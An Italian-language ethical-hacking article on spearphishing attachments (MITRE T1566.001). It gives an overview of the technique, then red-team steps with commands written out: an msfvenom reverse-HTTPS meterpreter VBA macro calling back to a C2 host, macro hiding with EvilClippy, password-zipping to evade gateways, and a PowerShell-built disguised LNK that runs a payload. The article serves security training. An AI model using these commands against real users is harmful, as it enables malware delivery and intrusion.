Allegati Malevoli via Email Mirata: Spearphishing Attachment (T1566.001)

Lo spearphishing con allegato malevolo resta uno dei vettori di accesso iniziale più prolifici nel panorama delle minacce. A differenza del phishing massivo, questa tecnica prende di mira individui, organizzazioni o settori specifici attraverso email confezionate ad hoc, allegando file che — una volta aperti dalla vittima — eseguono payload malevoli o sfruttano vulnerabilità applicative. La tecnica si colloca nella tattica Initial Access (TA0001), cioè la fase in cui l'avversario conquista il primo punto d'appoggio nella rete bersaglio.

I numeri raccontano la scala del problema: 77 gruppi APT documentati, 55 famiglie malware distribuite con questo metodo, 9 campagne tracciate e 7 mitigazioni applicabili. I formati sfruttati spaziano da documenti Microsoft Office (Word, Excel, HWP) a file RTF, PDF, eseguibili mascherati, archivi ZIP e RAR protetti da password, file ISO, LNK, CHM e persino HTA. Gli attaccanti manipolano estensioni e icone per far apparire un eseguibile come un documento innocuo, e spesso forniscono istruzioni nella mail stessa su come aggirare le protezioni — inclusa la password per decomprimere un archivio cifrato, tecnica che elude i gateway di posta.

L'efficacia della tecnica dipende dall'interazione umana: l'apertura del file innesca una catena che tipicamente passa per l'esecuzione di macro, lo sfruttamento di una vulnerabilità del parser documentale o l'esecuzione diretta di un binario camuffato.


Per simulare questa tecnica in un esercizio red team servono due ingredienti: un payload credibile e un meccanismo di consegna controllato. Il punto di partenza è la generazione di un documento Office armato con macro VBA che esegua un beacon di ritorno.

Con Mythic (open source), si può generare un agente Apollo o HTTP in formato shellcode, da iniettare in un documento tramite macro. Il framework permette di personalizzare il profilo C2, rendendo il traffico simile a navigazione legittima. Per chi preferisce un approccio consolidato, Cobalt Strike (a pagamento) offre il modulo Artifact Kit per generare payload in formato HTA, VBA macro o DLL, da incorporare in documenti Office.

La creazione del documento armato può avvenire con diversi approcci. Utilizzando msfvenom (open source, parte di Metasploit Framework) si genera un payload VBA:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<IP_C2> LPORT=443 -f vba-psh -o macro.vba

Il codice risultante va incollato nell'editor macro di un documento Word salvato in formato .docm o .doc. Per un approccio più sofisticato, EvilClippy (open source) permette di nascondere le macro VBA dalla visualizzazione dell'editor, rendendo il documento più evasivo all'analisi manuale:

EvilClippy.exe -s hidden_macro.vba documento.docm

Per simulare la variante con archivio protetto da password — tattica utilizzata da gruppi come Cobalt Group, DarkHydrus e BlackTech — basta impacchettare il payload in un archivio ZIP o RAR cifrato e includere la password nel corpo dell'email. Su Linux:

zip -P "invoice2024" payload.zip documento_armato.docm

La fase di consegna in laboratorio si gestisce con GoPhish (open source), che consente di creare campagne di phishing realistiche con tracking di apertura, click e download. Si configura un template email che replica comunicazioni aziendali, si allega il documento malevolo e si traccia quali utenti aprono il file.

Per testare la variante con file LNK — vettore usato da Gamaredon Group e Silence — si può usare LNKUp (open source) per generare file di collegamento che eseguano comandi PowerShell all'apertura. L'alternativa è creare LNK malevoli tramite PowerShell nativo:

$s = New-Object -ComObject WScript.Shell; $l = $s.CreateShortcut("report.lnk"); $l.TargetPath = "powershell.exe"; $l.Arguments = "-ep bypass -f \\payload.ps1"; $l.IconLocation = "wordicon.ico"; $l.Save()

Infine, per validare la resilienza dell'ambiente, è utile testare con file in formati multipli — .docm, .xlsm, .hta, .chm, .iso — e verificare quali passano i filtri del gateway di posta. Il framework Atomic Red Team (open source) include test specifici per T1566.001 che automatizzano parte di queste verifiche.


Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo

We use cookies

Utilizziamo i cookie sul nostro sito Web. Alcuni di essi sono essenziali per il funzionamento del sito, mentre altri ci aiutano a migliorare questo sito e l'esperienza dell'utente (cookie di tracciamento). Puoi decidere tu stesso se consentire o meno i cookie. Ti preghiamo di notare che se li rifiuti, potresti non essere in grado di utilizzare tutte le funzionalità del sito.